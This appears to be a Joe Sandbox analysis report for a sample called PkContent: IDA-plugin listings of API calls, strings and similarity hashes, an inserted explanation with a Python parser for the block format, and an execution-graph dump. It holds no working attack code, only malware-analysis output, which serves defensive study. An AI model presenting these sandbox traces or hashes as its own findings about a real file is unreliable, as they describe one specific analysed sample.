                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                • String ID: CopyFiles "%s"->"%s"
                                                • API String ID: 2577523808-3778932970
                                                • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrcatwsprintf
                                                • String ID: %02x%c$...
                                                • API String ID: 3065427908-1057055748
                                                • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
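Every function block in this listing has the same shape: an APIs list giving the resolved import, the argument values the sandbox recovered, and the call-site address after ref:, with callee lines marked "Part of subcall function"; a Strings list with xrefs; a Memory Dump Source block; and a Similarity block whose API ID, String ID, API String ID, Opcode ID and Instruction Fuzzy Hash are the keys Joe Sandbox uses to compare functions between samples. The Python below is an added example, not Joe Sandbox code: it parses that layout into structured records so the API sequences and similarity keys can be searched or matched across reports. The sample text is constructed from the registry-delete and DeleteRegKey/DeleteRegValue blocks on this page, plus one argument-less call line copied from the CopyFiles block to exercise that form; the regular expressions, class and function names are assumptions of mine, and splitting arguments on commas is deliberately naive.

```python
"""Parse Joe Sandbox IDA-plugin function blocks (APIs / Strings / Similarity)
into records for searching and cross-report matching. Added example code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample in the layout of the listing on this page. A block starts
# at every "APIs" heading; the "Memory Dump Source" lines are skipped.
SAMPLE = r"""
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Memory Dump Source
• Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
• Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
• lstrlenW.KERNEL32 ref: 004026B4
Strings
• DeleteRegKey: "%s\%s", xrefs: 00402843
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• API String ID: 1697273262-1764544995
• Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
• Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
BULLET = r"^\s*[•*-]\s*"
# "Name.MODULE(args), ref: ADDR"; the parenthesised args and the comma are optional
# (the listing prints "lstrlenW.KERNEL32 ref: ..." when no arguments were recovered).
API_RE = re.compile(
    BULLET
    + r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    + r"(?P<name>\w+)\.(?P<module>\w+)"
    + r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STR_RE = re.compile(BULLET + r"(?P<text>.*),\s*xrefs:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
KV_RE = re.compile(BULLET + r"(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]            # raw argument tokens, "?" where the sandbox had no value
    ref: int                   # call-site address from "ref:"
    subcall_of: int | None = None   # callee address when the line is "Part of subcall function"


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, int]] = field(default_factory=list)   # (text, xref address)
    similarity: dict[str, str] = field(default_factory=dict)        # e.g. "Opcode ID" -> hash

    def direct_api_names(self) -> list[str]:
        """APIs the function calls itself, in listing order, excluding subcall lines."""
        return [a.name for a in self.apis if a.subcall_of is None]


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    section, cur = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            section = line
            if line == "APIs":          # each block begins with its APIs heading
                cur = FunctionBlock()
                blocks.append(cur)
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []   # naive: no comma-aware quoting
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], int(m["ref"], 16)))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.similarity[m["key"]] = m["val"]
    return blocks


def functions_calling(blocks: list[FunctionBlock], api_name: str,
                      include_subcalls: bool = True) -> list[FunctionBlock]:
    """Blocks that reach api_name, optionally only through their own direct calls."""
    return [b for b in blocks
            if any(a.name == api_name and (include_subcalls or a.subcall_of is None)
                   for a in b.apis)]


def opcode_index(blocks: list[FunctionBlock]) -> dict[str, list[int]]:
    """Opcode ID -> block indexes; equal IDs across reports are shared-code candidates."""
    idx: dict[str, list[int]] = {}
    for i, b in enumerate(blocks):
        if oid := b.similarity.get("Opcode ID"):
            idx.setdefault(oid, []).append(i)
    return idx


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for i, b in enumerate(parsed):
        print(i, b.direct_api_names(), b.similarity.get("API String ID"))
    print("deletes registry values:", [parsed.index(b) for b in functions_calling(parsed, "RegDeleteValueW")])
```

Feeding the whole report text to parse_blocks gives one record per function; a typical use is to keep the Opcode ID and Instruction Fuzzy Hash of every block that reaches an interesting API and look for the same keys in other reports.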
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405057
                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                • API String ID: 2266616436-4211696005
                                                • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                APIs
                                                • GetDC.USER32(?), ref: 00402100
                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                • String ID:
                                                • API String ID: 1599320355-0
                                                • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                APIs
                                                  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                • String ID: Version
                                                • API String ID: 512980652-315105994
                                                • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                • GetTickCount.KERNEL32 ref: 00403303
                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                • String ID:
                                                • API String ID: 2883127279-0
                                                • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringlstrcmp
                                                • String ID: !N~
                                                • API String ID: 623250636-529124213
                                                • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                • CloseHandle.KERNEL32(?), ref: 00405C71
                                                Strings
                                                • Error launching installer, xrefs: 00405C48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                APIs
                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CloseHandlelstrlenwvsprintf
                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                • API String ID: 3509786178-2769509956
                                                • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                Execution Graph

                                                Execution Coverage: 4%
                                                Dynamic/Decrypted Code Coverage: 0%
                                                Signature Coverage: 2%
                                                Total number of Nodes: 2000
                                                Total number of Limit Nodes: 77
                                                execution_graph 98012 771016 98017 785ce7 98012->98017 98027 790fe6 98017->98027 98019 785cef 98020 77101b 98019->98020 98037 785f39 98019->98037 98024 792f70 98020->98024 98127 792e74 98024->98127 98026 771025 98030 790fee 98027->98030 98029 791008 98029->98019 98030->98029 98032 79100c std::exception::exception 98030->98032 98065 79593c 98030->98065 98082 7935d1 DecodePointer 98030->98082 98083 7987cb RaiseException 98032->98083 98034 791036 98084 798701 58 API calls _free 98034->98084 98036 791048 98036->98019 98038 785f42 98037->98038 98039 785cfb 98037->98039 98040 792f70 __cinit 67 API calls 98038->98040 98041 785d13 98039->98041 98040->98039 98093 781207 98041->98093 98045 785d6e 98052 785d9b 98045->98052 98111 781981 98045->98111 98047 785d8f 98115 78133d 98047->98115 98049 785e00 GetCurrentProcess IsWow64Process 98050 785e19 98049->98050 98053 785e98 GetSystemInfo 98050->98053 98054 785e2f 98050->98054 98051 7c1098 98052->98049 98052->98051 98055 785e65 98053->98055 98107 7855f0 98054->98107 98055->98020 98058 785e8c GetSystemInfo 98060 785e56 98058->98060 98059 785e41 98061 7855f0 2 API calls 98059->98061 98060->98055 98063 785e5c FreeLibrary 98060->98063 98062 785e49 GetNativeSystemInfo 98061->98062 98062->98060 98063->98055 98066 7959b7 98065->98066 98069 795948 98065->98069 98091 7935d1 DecodePointer 98066->98091 98068 7959bd 98092 798d58 58 API calls __getptd_noexit 98068->98092 98072 79597b RtlAllocateHeap 98069->98072 98075 795953 98069->98075 98076 7959a3 98069->98076 98080 7959a1 98069->98080 98088 7935d1 DecodePointer 98069->98088 98072->98069 98073 7959af 98072->98073 98073->98030 98075->98069 98085 79a39b 58 API calls 2 library calls 98075->98085 98086 79a3f8 58 API calls 8 library calls 98075->98086 98087 7932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98075->98087 98089 798d58 58 API calls __getptd_noexit 98076->98089 98090 798d58 58 API calls __getptd_noexit 
98080->98090 98082->98030 98083->98034 98084->98036 98085->98075 98086->98075 98088->98069 98089->98080 98090->98073 98091->98068 98092->98073 98094 790fe6 Mailbox 59 API calls 98093->98094 98095 781228 98094->98095 98096 790fe6 Mailbox 59 API calls 98095->98096 98097 781236 GetVersionExW 98096->98097 98098 781821 98097->98098 98099 78189a 98098->98099 98100 78182d __wsetenvp 98098->98100 98101 781981 59 API calls 98099->98101 98102 781868 98100->98102 98103 781843 98100->98103 98106 78184b _memmove 98101->98106 98120 781c7e 98102->98120 98119 781b7c 59 API calls Mailbox 98103->98119 98106->98045 98108 785619 98107->98108 98109 7855f9 LoadLibraryA 98107->98109 98108->98058 98108->98059 98109->98108 98110 78560a GetProcAddress 98109->98110 98110->98108 98112 781998 _memmove 98111->98112 98113 78198f 98111->98113 98112->98047 98113->98112 98123 781aa4 98113->98123 98116 78134b 98115->98116 98117 781981 59 API calls 98116->98117 98118 78135b 98117->98118 98118->98052 98119->98106 98121 790fe6 Mailbox 59 API calls 98120->98121 98122 781c88 98121->98122 98122->98106 98124 781ab7 98123->98124 98126 781ab4 _memmove 98123->98126 98125 790fe6 Mailbox 59 API calls 98124->98125 98125->98126 98126->98112 98128 792e80 __freefls@4 98127->98128 98135 793447 98128->98135 98134 792ea7 __freefls@4 98134->98026 98152 799e3b 98135->98152 98137 792e89 98138 792eb8 DecodePointer DecodePointer 98137->98138 98139 792ee5 98138->98139 98140 792e95 98138->98140 98139->98140 98198 7989d4 59 API calls __controlfp_s 98139->98198 98149 792eb2 98140->98149 98142 792f48 EncodePointer EncodePointer 98142->98140 98143 792f1c 98143->98140 98148 792f36 EncodePointer 98143->98148 98200 798a94 61 API calls 2 library calls 98143->98200 98144 792ef7 98144->98142 98144->98143 98199 798a94 61 API calls 2 library calls 98144->98199 98147 792f30 98147->98140 98147->98148 98148->98142 98201 793450 98149->98201 98153 799e4c 98152->98153 98154 799e5f EnterCriticalSection 98152->98154 98159 799ec3 98153->98159 
98154->98137 98156 799e52 98156->98154 98183 7932e5 58 API calls 3 library calls 98156->98183 98160 799ecf __freefls@4 98159->98160 98161 799ed8 98160->98161 98162 799ef0 98160->98162 98184 79a39b 58 API calls 2 library calls 98161->98184 98174 799f11 __freefls@4 98162->98174 98187 798a4d 58 API calls 2 library calls 98162->98187 98164 799edd 98185 79a3f8 58 API calls 8 library calls 98164->98185 98167 799f05 98169 799f1b 98167->98169 98170 799f0c 98167->98170 98168 799ee4 98186 7932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98168->98186 98171 799e3b __lock 58 API calls 98169->98171 98188 798d58 58 API calls __getptd_noexit 98170->98188 98175 799f22 98171->98175 98174->98156 98177 799f2f 98175->98177 98178 799f47 98175->98178 98189 79a05b InitializeCriticalSectionAndSpinCount 98177->98189 98190 792f85 98178->98190 98181 799f3b 98196 799f63 LeaveCriticalSection _doexit 98181->98196 98184->98164 98185->98168 98187->98167 98188->98174 98189->98181 98191 792fb7 _free 98190->98191 98192 792f8e RtlFreeHeap 98190->98192 98191->98181 98192->98191 98193 792fa3 98192->98193 98197 798d58 58 API calls __getptd_noexit 98193->98197 98195 792fa9 GetLastError 98195->98191 98196->98174 98197->98195 98198->98144 98199->98143 98200->98147 98204 799fa5 LeaveCriticalSection 98201->98204 98203 792eb7 98203->98134 98204->98203 98205 771055 98210 772a19 98205->98210 98208 792f70 __cinit 67 API calls 98209 771064 98208->98209 98211 781207 59 API calls 98210->98211 98212 772a87 98211->98212 98217 771256 98212->98217 98215 772b24 98216 77105a 98215->98216 98220 7713f8 59 API calls 2 library calls 98215->98220 98216->98208 98221 771284 98217->98221 98220->98215 98222 771275 98221->98222 98223 771291 98221->98223 98222->98215 98223->98222 98224 771298 RegOpenKeyExW 98223->98224 98224->98222 98225 7712b2 RegQueryValueExW 98224->98225 98226 7712d3 98225->98226 98227 7712e8 RegCloseKey 98225->98227 98226->98227 98227->98222 98228 775ff5 98252 775ede Mailbox _memmove 
98228->98252 98229 790fe6 59 API calls Mailbox 98229->98252 98230 776a9b 98513 77a9de 299 API calls 98230->98513 98233 7aeff9 98533 775190 59 API calls Mailbox 98233->98533 98235 7af007 98534 7da48d 89 API calls 4 library calls 98235->98534 98239 7aefeb 98285 775569 Mailbox 98239->98285 98532 7c6cf1 59 API calls Mailbox 98239->98532 98240 7760e5 98241 7ae137 98240->98241 98246 7763bd Mailbox 98240->98246 98254 776abc 98240->98254 98269 776152 Mailbox 98240->98269 98241->98246 98514 7c7aad 59 API calls 98241->98514 98244 790fe6 Mailbox 59 API calls 98249 7763d1 98244->98249 98246->98244 98259 776426 98246->98259 98251 7763de 98249->98251 98249->98254 98255 776413 98251->98255 98256 7ae172 98251->98256 98252->98229 98252->98230 98252->98233 98252->98235 98252->98240 98252->98254 98252->98285 98298 7753b0 98252->98298 98469 7ec355 98252->98469 98512 77523c 59 API calls 98252->98512 98517 781c9c 98252->98517 98521 7d7f11 59 API calls Mailbox 98252->98521 98522 781a36 98252->98522 98526 7c6cf1 59 API calls Mailbox 98252->98526 98531 7da48d 89 API calls 4 library calls 98254->98531 98255->98259 98286 775447 Mailbox 98255->98286 98515 7ec87c 85 API calls 2 library calls 98256->98515 98516 7ec9c9 95 API calls 